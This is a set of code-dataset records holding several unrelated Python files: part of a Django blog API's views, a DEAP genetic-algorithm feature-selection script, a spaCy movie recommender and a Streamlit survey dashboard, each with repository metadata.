blog.delete()\r\n return JsonResponse({\"Success\": f\"Data with the {id} was deleted Successfully\"})\r\n else:\r\n return JsonResponse({\"Failure\": \"Data with the Specific Id was not Found\"})\r\n\r\n# Searchs Through the Fields and Returns Blogs based on that \r\ndef search(request):\r\n query = request.GET['query']\r\n blog = 
Blog.objects.filter(title__icontains=query) or Blog.objects.filter(author__icontains=query) or Blog.objects.filter(content__icontains=query)\r\n data = {\"results\" : list(blog.values(\"id\", \"author\", \"title\", \"content\", \"tags\"))} \r\n return JsonResponse(data)\r\n\r\n \r\n@csrf_exempt\r\ndef update(request):\r\n\r\n if request.method == \"POST\":\r\n id = request.POST['id']\r\n title = request.POST['title']\r\n author = request.POST['author']\r\n content = request.POST['content']\r\n if len(title) > 5 and len(author) > 2 and len(content) >3:\r\n blog = Blog.objects.filter(id=id)\r\n blog.update(title=title, author=author, content=content)\r\n print(\"Udpated Successfully\")\r\n return JsonResponse({\"Success\": f\"Blog with id {id} has been Updated Successfully\"})\r\n else:\r\n return JsonResponse({\"Invalid Length\": \"Length of all the Fields must be greater than 5\"})\r\n \r\n else:\r\n return JsonResponse({\"Invalid Request Type\": \"Request Type POST Expected.\"})\r\n", "repo_name": "arkalsekar/Django-Blog-API", "sub_path": "home/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3574, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.http.JsonResponse", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Blog.objects.all", "line_number": 19, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 19, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Blog", "line_number": 26, "usage_type": "argument"}, {"api_name": "django.http.JsonResponse", "line_number": 33, "usage_type": "call"}, {"api_name": "models.Blog", "line_number": 43, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 45, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 47, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 50, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 36, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 54, "usage_type": "call"}, {"api_name": "models.Blog", "line_number": 54, "usage_type": "argument"}, {"api_name": "django.http.JsonResponse", "line_number": 57, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Blog.objects.filter", "line_number": 64, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 64, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 66, "usage_type": "call"}, {"api_name": "models.Blog.objects.filter", "line_number": 78, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 78, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 78, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 81, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 83, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 86, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 69, 
"usage_type": "name"}]} +{"seq_id": "35589965502", "text": "# This file is part of DEAP.\n#\n# DEAP is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as\n# published by the Free Software Foundation, either version 3 of\n# the License, or (at your option) any later version.\n#\n# DEAP is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with DEAP. If not, see .\n\n\n# example which maximizes the sum of a list of integers\n# each of which can be 0 or 1\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport random\nimport copy\nimport sys\nfrom deap import base\nfrom deap import creator\nfrom deap import tools\nfrom os import chdir\nfrom sklearn import svm\nimport scipy.io as sio\n#you can change the two parameters below to modify the number of samples and features\nglobal numofsamples\nglobal numoffeatures\nglobal numoftest\nnumgeneration=2000\nnumpopulation=1000\n#read the features of signals\nchdir('/Users/dingshilun/Documents/Junior/SRTP/srtp')\n\ndef loaddatafrommat(filename, matname):\n global numofsamples\n global numoffeatures\n global numoftest\n dat = sio.loadmat(filename)\n if(matname=='train'):\n numofsamples=dat[matname].shape[0]\n numoffeatures=dat[matname].shape[1]-1\n else:\n numoftest=dat[matname].shape[0]\n mat = {}\n mat['data'] = []\n mat['labels'] = []\n\n for row in dat[matname]:\n if row[0]==0:\n break\n tmp=[]\n for col in range(0,numoffeatures):\n tmp.append(row[col])\n mat['labels'].append(row[numoffeatures])\n mat['data'].append(tmp)\n return mat\n\nglobal emg\nglobal testS\n\nemg = loaddatafrommat('train_1_3_pca.mat', 'train')\ntestS = loaddatafrommat('test_1_3_pca.mat', 'test')#test samples\n\ncreator.create(\"FitnessMax\", base.Fitness, weights=(1.0,))\ncreator.create(\"Individual\", list, fitness=creator.FitnessMax)\n\ntoolbox = base.Toolbox()\n\n# Attribute generator\n# define 'attr_bool' to be an attribute ('gene')\n# which corresponds to integers sampled uniformly\n# from the range [0,1] (i.e. 
0 or 1 with equal\n# probability)\ntoolbox.register(\"attr_bool\", random.randint, 0, 1)\n\n# Structure initializers\n# define 'individual' to be an individual\n# consisting of numoffeatures 'attr_bool' elements ('genes')\ntoolbox.register(\"individual\", tools.initRepeat, creator.Individual,\n toolbox.attr_bool, numoffeatures)\n\n# define the population to be a list of individuals\ntoolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n\n# the goal ('fitness') function to be maximized\ndef evalOneMax(individual):\n ans=0\n feat=copy.deepcopy(emg)\n test=copy.deepcopy(testS)\n itemi=0\n for itemi in range(0,numofsamples):\n feat['data'][itemi]=[]\n for it in range(0,numoffeatures):\n if (individual[it]):\n #print(it)\n #print(\"labels\",emg['labels'][it])\n #print(itemi)\n temp=emg['data'][itemi][it]\n #print(temp)\n feat['data'][itemi].append(temp)\n #feat['data'][itemi].reshape(-1,1);\n #feat['labels'].append(emg['labels'][itemi])\n #print(feat['data'][0])\n #print(emg['data'][0][0])\n# print(feat['data'])\n for itemi in range(0,numoftest):\n test['data'][itemi]=[]\n for it in range(0,numoffeatures):\n if (individual[it]):\n #print(it)\n #print(\"labels\",emg['labels'][it])\n #print(itemi)\n temp=testS['data'][itemi][it]\n #print(temp)\n test['data'][itemi].append(temp)\n\n reg = svm.SVC(kernel='rbf')\n\n reg.fit(feat['data'], feat['labels'])\n count=0\n for i in range(0, numoftest):\n #print reg.predict(feat['data'][i])\n if (reg.predict([test['data'][i]])==test['labels'][i]):\n count+=1\n\n #print(feat['labels'][1])\n #calculate the fitness to decide if the individual is suitable for the next generation\n return count,\n\n#----------\n# Operator registration\n#----------\n# register the goal / fitness function\ntoolbox.register(\"evaluate\", evalOneMax)\n\n# register the crossover operator\ntoolbox.register(\"mate\", tools.cxTwoPoint)\n\n# register a mutation operator with a probability to\n# flip each attribute/gene of 0.05\ntoolbox.register(\"mutate\", tools.mutFlipBit, indpb=0.05)\n\n# operator for selecting individuals for breeding the next\n# generation: each individual of the current generation\n# is replaced by the 'fittest' (best) of three individuals\n# drawn randomly from the current generation.\ntoolbox.register(\"select\", tools.selTournament, tournsize=3)\n\n#----------\n\ndef main(argv):\n global emg\n global testS\n emg = loaddatafrommat(argv[1], 'train')\n testS = loaddatafrommat(argv[2], 'test') # test samples\n random.seed(64)\n\n # create an initial population of numpopulation individuals (where\n # each individual is a list of integers)\n pop = toolbox.population(n=numpopulation)\n\n # CXPB is the probability with which two individuals\n # are crossed\n #\n # MUTPB is the probability for mutating an individual\n #\n # NGEN is the number of generations for which the\n # evolution runs\n CXPB, MUTPB, NGEN = 0.5, 0.2, numgeneration\n\n print(\"Start of evolution\")\n\n # Evaluate the entire population\n fitnesses = list(map(toolbox.evaluate, pop))\n for ind, fit in zip(pop, fitnesses):\n ind.fitness.values = fit\n\n print(\" Evaluated %i individuals\" % len(pop))\n\n # Begin the evolution\n for g in range(NGEN):\n print(\"-- Generation %i --\" % g)\n\n # Select the next generation individuals\n offspring = toolbox.select(pop, len(pop))\n # Clone the selected individuals\n offspring = list(map(toolbox.clone, offspring))\n\n # Apply crossover and mutation on the offspring\n for child1, child2 in zip(offspring[::2], offspring[1::2]):\n\n # cross two individuals with 
probability CXPB\n if random.random() < CXPB:\n toolbox.mate(child1, child2)\n\n # fitness values of the children\n # must be recalculated later\n del child1.fitness.values\n del child2.fitness.values\n\n for mutant in offspring:\n\n # mutate an individual with probability MUTPB\n if random.random() < MUTPB:\n toolbox.mutate(mutant)\n del mutant.fitness.values\n\n # Evaluate the individuals with an invalid fitness\n invalid_ind = [ind for ind in offspring if not ind.fitness.valid]\n fitnesses = map(toolbox.evaluate, invalid_ind)\n for ind, fit in zip(invalid_ind, fitnesses):\n ind.fitness.values = fit\n\n print(\" Evaluated %i individuals\" % len(invalid_ind))\n\n # The population is entirely replaced by the offspring\n pop[:] = offspring\n\n # Gather all the fitnesses in one list and print the stats\n fits = [ind.fitness.values[0] for ind in pop]\n\n length = len(pop)\n mean = sum(fits) / length\n sum2 = sum(x*x for x in fits)\n std = abs(sum2 / length - mean**2)**0.5\n\n print(\" Min %s\" % min(fits))\n print(\" Max %s\" % max(fits))\n print(\" Avg %s\" % mean)\n print(\" Std %s\" % std)\n\n print(\"-- End of (successful) evolution --\")\n\n best_ind = tools.selBest(pop, 1)[0]\n print(\"Best individual is %s, %s\" % (best_ind, best_ind.fitness.values))\n\nif __name__ == \"__main__\":\n main(sys.argv)\n", "repo_name": "lucas95123/SRTP_Emotion_Recognization", "sub_path": "Feature Selection/genetic_algorithm_feature_selection.py", "file_name": "genetic_algorithm_feature_selection.py", "file_ext": "py", "file_size_in_byte": 7921, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 20, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 38, "usage_type": "call"}, {"api_name": "scipy.io.loadmat", "line_number": 44, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 44, "usage_type": "name"}, {"api_name": "deap.creator.create", "line_number": 70, "usage_type": "call"}, {"api_name": "deap.creator", "line_number": 70, "usage_type": "name"}, {"api_name": "deap.base.Fitness", "line_number": 70, "usage_type": "attribute"}, {"api_name": "deap.base", "line_number": 70, "usage_type": "name"}, {"api_name": "deap.creator.create", "line_number": 71, "usage_type": "call"}, {"api_name": "deap.creator", "line_number": 71, "usage_type": "name"}, {"api_name": "deap.creator.FitnessMax", "line_number": 71, "usage_type": "attribute"}, {"api_name": "deap.base.Toolbox", "line_number": 73, "usage_type": "call"}, {"api_name": "deap.base", "line_number": 73, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 80, "usage_type": "attribute"}, {"api_name": "deap.tools.initRepeat", "line_number": 85, "usage_type": "attribute"}, {"api_name": "deap.tools", "line_number": 85, "usage_type": "name"}, {"api_name": "deap.creator.Individual", "line_number": 85, "usage_type": "attribute"}, {"api_name": "deap.creator", "line_number": 85, "usage_type": "name"}, {"api_name": "deap.tools.initRepeat", "line_number": 89, "usage_type": "attribute"}, {"api_name": "deap.tools", "line_number": 89, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 94, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 123, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 123, "usage_type": "name"}, {"api_name": "deap.tools.cxTwoPoint", "line_number": 143, "usage_type": 
"attribute"}, {"api_name": "deap.tools", "line_number": 143, "usage_type": "name"}, {"api_name": "deap.tools.mutFlipBit", "line_number": 147, "usage_type": "attribute"}, {"api_name": "deap.tools", "line_number": 147, "usage_type": "name"}, {"api_name": "deap.tools.selTournament", "line_number": 153, "usage_type": "attribute"}, {"api_name": "deap.tools", "line_number": 153, "usage_type": "name"}, {"api_name": "random.seed", "line_number": 162, "usage_type": "call"}, {"api_name": "random.random", "line_number": 199, "usage_type": "call"}, {"api_name": "random.random", "line_number": 210, "usage_type": "call"}, {"api_name": "deap.tools.selBest", "line_number": 240, "usage_type": "call"}, {"api_name": "deap.tools", "line_number": 240, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 244, "usage_type": "attribute"}]} +{"seq_id": "11119153952", "text": "# import spacy module and load en_core_web_md\nimport spacy\nnlp = spacy.load('en_core_web_md')\n\n# create f_movies variable to contain file - set as value None\nf_movies = None\n# try to open movies.txt to read\ntry:\n f_movies = open(\"movies.txt\", \"r\")\n\n # create empty list for movie descriptions\n movies = []\n\n # add each line to movies list after removal of \"\\n\"\n for line in f_movies:\n line_update = line.replace(\"\\n\", \"\")\n movies.append(line_update)\n# except statement in case file not found.\nexcept FileNotFoundError:\n print(\"The movies.txt file cannot be found.\")\n# finally once data read, close file.\nfinally:\n if f_movies is not None:\n f_movies.close()\n\n# dictionary variable created with one entry, key as movie name \nuser_watched_movie_list = [\"Planet Hulk\"]\nuser_watched_desc_list = [\"\"\"Will he save their world or destroy it? When the Hulk becomes too dangerous for the Earth, \nthe Illuminati trick Hulk into a shuttle and launch him into space to a planet where the Hulk can live in peace. 
\nUnfortunately, Hulk lands on the planet Sakaar where he is sold into slavery and trained as a gladiator.\"\"\"]\n\n# variable created to contain index for movie being compared - with only one movie in above lists index is 0.\nmovie_comparison = 0\n\n# nlp description from desc_list using movie_comparison\nnlp_user_movie = nlp(user_watched_desc_list[movie_comparison])\n\n# create two empty lists to contain the movie name for each movie in \"movies\" list and similarity to user movie.\nmovie_names = []\nmovie_similarity = []\n# for loop through each movie description to extract required info for each movie and nlp for each movie description\nfor item in movies:\n movie_name = item[0:7]\n movie_desc = item[9::]\n\n nlp_movie_desc = nlp(movie_desc)\n\n # similarity value compared against nlp_user_movie and data appended to movie_names list and movie_similarity list.\n similarity_with_movie = nlp_user_movie.similarity(nlp_movie_desc)\n\n movie_names.append(movie_name)\n movie_similarity.append(similarity_with_movie)\n \n\n# creation of variable to track index of value of highest similarity\nhighest_similarity_index = 0\n\n# for range of len movie_similarity\nfor index in range(len(movie_similarity)):\n # if the similarity at this index is greater than the current best, make it the new highest_similarity_index\n # (a similarity of 1 would mean an identical description, i.e. the same movie)\n if movie_similarity[index] > movie_similarity[highest_similarity_index]:\n highest_similarity_index = index\n\n# match percent calculation\nmovie_perc = round((movie_similarity[highest_similarity_index]*100))\n\n# final print statement to indicate recommended movie using highest_similarity_index with movie_names list.\nprint(f\"\\nBased on your recently watched movie \\\"{user_watched_movie_list[movie_comparison]}\\\", your recommended movie is \\\"{movie_names[highest_similarity_index]}\\\" with a match of {movie_perc}%.\\n\")", "repo_name": "Hemal91/movies_rec", "sub_path": "watch_next.py", "file_name": "watch_next.py", "file_ext": "py", "file_size_in_byte": 3024, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "spacy.load", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "33973832415", "text": "## Survey Summary\n\n## Library Imports\nimport streamlit as st\nfrom PIL import Image\nimport numpy as np\nimport plotly.express as px\nimport plotly.figure_factory as ff\nimport plotly.graph_objects as go\n\nfrom data_sources import google_sheets\nfrom src import feedback_lib, summary_lib\nfrom src.resources import colour_palette\nfrom src.util import add_footer\nfrom plotly.subplots import make_subplots\n\n## Outline\n# 1: Headline\n# 2: Summary statement\n# 3: How many people responded\n# 4: Average feedback scores in each area\n# 5: Main topics identified from feedback text\n# 6: Buildings - Average Feedback Score\n# 7: Breakdown for each building\n\n# Global Variables\ntheme_plotly = None # None or streamlit\n\n# Layout\nst.set_page_config(page_title='RIGRA Survey', layout='wide')\n\n# Data Sources\ndf_summary = google_sheets.load_summary_data()\ndf_feedback = google_sheets.load_feedback_data()\ndf_mapping = df_feedback[['question_category','question']].drop_duplicates()\n\n## Topics\ndf_topics = google_sheets.load_topic_data()\n\n## Data Sources - Add colour column to feedback\nvalues = ['red', 'blue', 'green']\n\n# RIGRA logo\nlogo_rigra = 
Image.open('./images/rigra_logo.png')\nimage_col1, image_col2, image_col3 = st.columns(3)\nwith image_col1:\n st.write(' ')\nwith image_col2:\n st.image(logo_rigra)\nwith image_col3:\n st.write(' ')\n \ndef create_colour_conditions(df_colour):\n values = ['#FF0000', '#0000FF', '#00FF00']\n conditions_filtered = [\n (df_colour['feedback_score'] <= 3),\n (df_colour['feedback_score'] > 3) & (df_colour['feedback_score'] <= 4),\n (df_colour['feedback_score'] > 4),\n ]\n df_colour['feedback_colour'] = np.select(conditions_filtered, values)\n return df_colour\n\n# Title\nst.title('Survey Summary')\n\n## Header\n\n## Summary\nst.markdown(\n '''\n The survey consisted of 8 categories of questions, with options to rate each question from 1 (worst) to 5 (best). \n \n The average feedback across all questions was **3.4** out of 5.\n \n The majority of the feedback received was **neutral** (score of 3 or 4). There was more negative (1-3) than positive (5) feedback. \n \n The survey results show that the questions on **Communal Areas** and **R&R Satisfaction - Facilities** had the most negative feedback.\n '''\n)\nst.write('')\nst.write('')\n\nst.markdown('---')\n\n## Survey Responses Overview\nst.subheader(\"Survey Responses Overview\")\nst_col_01, st_col_02, st_col_03, st_col_04, st_col_05 = st.columns(5)\nst_col_01.metric(\"All Responses\", summary_lib.metric_residents_all(df_summary))\nst_col_02.metric(\n \"Contactable Responses\", summary_lib.metric_residents_contactable(df_summary)\n)\nst_col_03.metric(\n \"Leaseholders\", f\"{summary_lib.metric_residents_leaseholder(df_summary)}%\"\n)\nst_col_04.metric(\"Non-resident Leaseholders\", f\"{summary_lib.metric_residents_nonresident_leaseholder(df_summary)}%\")\nst_col_05.metric(\"Tenants\", f\"{summary_lib.metric_residents_tenant(df_summary)}%\")\nst.write('')\nbc_01, bc_02 = st.columns(2)\n\nwith bc_01:\n fig = px.bar(\n summary_lib.filter_summary_data(df_summary, \"resident_type\"),\n x=\"Description\",\n y=\"Number\",\n title=\"Resident Type\",\n log_y=False,\n )\n fig.update_layout(\n showlegend=False,\n xaxis_title=None,\n yaxis_title=\"Number of Responses\",\n xaxis={\"categoryorder\": \"category ascending\"},\n plot_bgcolor=colour_palette['background'],\n )\n fig.update_xaxes(showgrid = False)\n fig.update_yaxes(showgrid = False)\n st.plotly_chart(fig, use_container_width=True, theme=theme_plotly)\n\n fig = px.bar(\n summary_lib.filter_summary_data(df_summary, \"building_name\"),\n x=\"Description\",\n y=\"Number\",\n title=\"Building Name\",\n log_y=False,\n )\n fig.update_layout(\n showlegend=False,\n xaxis_title=None,\n yaxis_title=\"Number of Responses\",\n xaxis={\"categoryorder\": \"category ascending\"},\n plot_bgcolor=colour_palette['background'],\n )\n fig.update_xaxes(showgrid = False)\n fig.update_yaxes(showgrid = False)\n st.plotly_chart(fig, use_container_width=True, theme=theme_plotly)\n \nwith bc_02:\n\n fig = px.bar(\n summary_lib.filter_summary_data(df_summary, \"resident_length\"),\n x=\"Description\",\n y=\"Number\",\n title=\"Resident Length\",\n log_y=False,\n )\n fig.update_layout(\n showlegend=False,\n xaxis_title=None,\n yaxis_title=\"Number of Responses\",\n xaxis={\"categoryorder\": \"category ascending\"},\n plot_bgcolor=colour_palette['background'],\n )\n fig.update_xaxes(showgrid = False)\n fig.update_yaxes(showgrid = False)\n st.plotly_chart(fig, use_container_width=True, theme=theme_plotly)\nst.write()\n\n\n## Feedback Overview\nst.markdown('---')\nst.subheader(\"Feedback Overview\")\nstf_col_01, stf_col_02, 
stf_col_03, stf_col_04, stf_col_05 = st.columns(5)\nstf_col_01.metric(\n \"Responses\", int(df_feedback['response_id'].max())\n)\nstf_col_02.metric(\n \"Average Feedback\", \n f'{feedback_lib.feedback_all_mean(df_feedback)}',\n \"Out of 5.0\",\n \"off\"\n)\nstf_col_03.metric(\n \"Positive Feedback\", \n f\"{feedback_lib.feedback_all_nps_percentages(df_feedback, 'positive')}%\",\n \"Score 4+\",\n \"off\"\n)\nstf_col_04.metric(\n \"Neutral Feedback\", \n f\"{feedback_lib.feedback_all_nps_percentages(df_feedback, 'neutral')}%\",\n \"Score 3-4\",\n \"off\"\n)\nstf_col_05.metric(\n \"Negative Feedback\", \n f\"{feedback_lib.feedback_all_nps_percentages(df_feedback, 'negative')}%\",\n \"Score 1-3\",\n \"off\"\n)\n\n## SPACER\nst.write(\"#\")\n\n## Feedback Questions\nst.subheader('Feedback Questions - Categories')\nst.markdown(\n \"Questions and mapping to question categories are shown below\"\n)\nmapping_style = df_mapping.style.hide_index()\nst.write(mapping_style.to_html(), unsafe_allow_html=True)\n\n## SPACER\nst.write(\"#\")\n### Navigation\ntab1, tab2, tab3 = st.tabs([\"Feedback Score Summary\", \"Feedback Score by Building\", \"Feedback Topics\"])\n\n### Tab 01 - Summary\nwith tab1:\n st.header(\"Average Feedback Scores\")\n df_plot = feedback_lib.feedback_questions_average(df_feedback)\n df_plot = create_colour_conditions(df_plot)\n fig = px.bar(\n df_plot,\n y = \"question_category\",\n x = \"feedback_score\",\n title = \"Questions - Average Feedback\",\n color = 'feedback_colour',\n log_y = False,\n orientation = 'h'\n )\n fig.update_layout(\n showlegend = False,\n yaxis_title = None,\n xaxis_title = \"Feedback Score (Average)\",\n yaxis = {\"categoryorder\": \"category descending\"},\n plot_bgcolor = colour_palette['background'],\n margin = dict(l = 200),\n xaxis_range=[1,5]\n )\n fig.update_xaxes(showgrid = False)\n fig.update_yaxes(showgrid = False)\n st.plotly_chart(fig, use_container_width=True, theme=theme_plotly)\n\n ## Question Feedback Breakdown\n st.write('')\n st.subheader('Breakdown of Feedback - Positive and Negative Question Feedback')\n st.write('Note: Feedback here also takes into account the free-text feedback (the sentiment of those answers). The higher the value, the more overall positive responses there were. 
The more negative the value, the more overall negative responses there were.')\n ## Overall breakdown - positive vs negative\n df_fb = google_sheets.load_sentiment_data()\n df_fb_positive = (\n df_fb[df_fb[\"sentiment\"] == \"positive\"]\n .groupby([\"feedback_category\", \"sentiment\"])\n .size()\n .reset_index(name=\"counts\")\n .rename(columns={\"index\": \"positive\"})\n )\n df_fb_negative = (\n df_fb[df_fb[\"sentiment\"] == \"negative\"]\n .groupby([\"feedback_category\", \"sentiment\"])\n .size()\n .reset_index(name=\"counts\")\n .rename(columns={\"index\": \"negative\"})\n )\n df_fb_negative[\"counts\"] *= -1\n fig = make_subplots(\n rows=1, cols=2, specs=[[{}, {}]], shared_yaxes=True, horizontal_spacing=0\n )\n fig.append_trace(\n go.Bar(\n x=df_fb_negative.counts,\n y=df_fb_negative.feedback_category,\n orientation=\"h\",\n showlegend=True,\n #text=df_fb_negative.counts,\n name=\"Negative Feedback\",\n marker_color=\"#b20710\",\n ),\n 1,\n 1,\n )\n fig.append_trace(\n go.Bar(\n x=df_fb_positive.counts,\n y=df_fb_positive.feedback_category,\n orientation=\"h\",\n showlegend=True,\n #text=df_fb_positive.counts,\n name=\"Positive Feedback\",\n marker_color=\"green\",\n ),\n 1,\n 2,\n )\n fig.update_layout(\n plot_bgcolor=colour_palette[\"background\"],\n margin=dict(l=200),\n )\n fig.update_xaxes(showgrid=False)\n fig.update_yaxes(\n showgrid=False, categoryorder=\"total ascending\", ticksuffix=\" \", showline=False\n )\n fig.update_traces(textposition=\"auto\")\n st.plotly_chart(fig, use_container_width=True, theme=theme_plotly)\n\ndef set_color(row):\n if row[\"feedback_score\"] < 3:\n return \"negative\"\n elif row[\"feedback_score\"] > 4:\n return \"positive\"\n else:\n return \"neutral\"\n\n### Loop and plot\n# SPACER\nwith tab2:\n st.header(\"Average Feedback Score - Split By Building\")\n list_building_name = list(df_feedback['building_name'].drop_duplicates())\n for building in list_building_name:\n df_feedback_filtered = df_feedback[df_feedback['building_name'] == building]\n st.write(\"#\")\n st.subheader(f\"Average Feedback Score - {building}\")\n df_plot_filtered = feedback_lib.feedback_questions_average(df_feedback_filtered)\n df_plot_filtered = df_plot_filtered[['question_category','feedback_score']]\n df_plot_filtered = df_plot_filtered.astype({'feedback_score': 'float'})\n #df_plot_filtered = create_colour_conditions(df_plot_filtered)\n df_plot_filtered = df_plot_filtered.assign(feedback_colour=df_plot_filtered.apply(set_color, axis=1))\n \n fig = px.bar(\n df_plot_filtered,\n y = \"question_category\",\n x = \"feedback_score\",\n color = \"feedback_colour\",\n title = f\"Questions - Average Feedback ({building})\",\n log_y = False,\n orientation = 'h',\n color_discrete_map= {\n 'negative': '#c0392b',\n 'neutral': '#2980b9',\n 'positive': '#27ae60'\n }\n )\n fig.update_layout(\n showlegend = False,\n yaxis_title = None,\n xaxis_title = \"Feedback Score (Average)\",\n yaxis = {\"categoryorder\": \"category descending\"},\n plot_bgcolor = colour_palette['background'],\n margin = dict(l = 200),\n xaxis_range=[1,5]\n )\n fig.update_xaxes(showgrid = False)\n fig.update_yaxes(showgrid = False)\n st.plotly_chart(fig, use_container_width=True, theme=theme_plotly)\n \n## Topics\nwith tab3:\n st.header(\"Free Text Feedback - Topic Modelling\")\n st.write(\"#\")\n st.write(\"Topic modelling is generated from the free-text feedback for each question category.\")\n st.write(\"If a question category is not present, that means not enough feedback was received to generate 
topics.\")\n st.write(\"A maximum of 5 topics can be generated for each category.\")\n st.write(\"Each topic is broken down into the top words of that topic.\")\n st.write(\"#\")\n st.subheader(\"Topics Summary: All feedback\")\n df_topics_all = df_topics[df_topics['feedback_category'] == 'All']\n list_topics_all = list(set(df_topics_all['topic']))\n list_topics_all.sort()\n for topics_all in list_topics_all:\n tmp_topics = ', '.join(list(df_topics_all['word'][df_topics_all['topic'] == topics_all]))\n st.write(f'{topics_all}: {tmp_topics}')\n st.write(\"#\")\n feedback_cat_list = list(set(df_topics['feedback_category']))\n feedback_cat_list = [x for x in feedback_cat_list if x != 'All']\n for feed_cat in feedback_cat_list:\n st.subheader(f\"Topics Summary: {feed_cat}\")\n df_topics_feed = df_topics[df_topics['feedback_category'] == feed_cat]\n list_topics_feed = list(set(df_topics_feed['topic']))\n list_topics_feed.sort()\n for topics_feed in list_topics_feed:\n tmp_topics = ', '.join(list(df_topics_feed['word'][df_topics_feed['topic'] == topics_feed]))\n st.write(f'{topics_feed}: {tmp_topics}')\n\n## Add Footer\nadd_footer()", "repo_name": "seanaller/interactive-rigra-survey-data-app", "sub_path": "pages/1_Survey_Summary.py", "file_name": "1_Survey_Summary.py", "file_ext": "py", "file_size_in_byte": 12499, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "streamlit.set_page_config", "line_number": 30, "usage_type": "call"}, {"api_name": "data_sources.google_sheets.load_summary_data", "line_number": 33, "usage_type": "call"}, {"api_name": "data_sources.google_sheets", "line_number": 33, "usage_type": "name"}, {"api_name": "data_sources.google_sheets.load_feedback_data", "line_number": 34, "usage_type": "call"}, {"api_name": "data_sources.google_sheets", "line_number": 34, "usage_type": "name"}, {"api_name": "data_sources.google_sheets.load_topic_data", "line_number": 38, "usage_type": "call"}, {"api_name": "data_sources.google_sheets", "line_number": 38, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 44, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 44, "usage_type": "name"}, {"api_name": "streamlit.columns", "line_number": 45, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 47, "usage_type": "call"}, {"api_name": "streamlit.image", "line_number": 49, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.select", "line_number": 60, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 64, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 69, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 80, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 81, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 83, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 86, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 87, "usage_type": "call"}, {"api_name": "src.summary_lib.metric_residents_all", "line_number": 88, "usage_type": "call"}, {"api_name": "src.summary_lib", "line_number": 88, "usage_type": "name"}, {"api_name": "src.summary_lib.metric_residents_contactable", "line_number": 90, "usage_type": "call"}, {"api_name": "src.summary_lib", "line_number": 90, "usage_type": "name"}, {"api_name": "src.summary_lib.metric_residents_leaseholder", 
"line_number": 93, "usage_type": "call"}, {"api_name": "src.summary_lib", "line_number": 93, "usage_type": "name"}, {"api_name": "src.summary_lib.metric_residents_nonresident_leaseholder", "line_number": 95, "usage_type": "call"}, {"api_name": "src.summary_lib", "line_number": 95, "usage_type": "name"}, {"api_name": "src.summary_lib.metric_residents_tenant", "line_number": 96, "usage_type": "call"}, {"api_name": "src.summary_lib", "line_number": 96, "usage_type": "name"}, {"api_name": "streamlit.write", "line_number": 97, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 98, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 101, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 101, "usage_type": "name"}, {"api_name": "src.summary_lib.filter_summary_data", "line_number": 102, "usage_type": "call"}, {"api_name": "src.summary_lib", "line_number": 102, "usage_type": "name"}, {"api_name": "src.resources.colour_palette", "line_number": 113, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 117, "usage_type": "call"}, {"api_name": "plotly.express.bar", 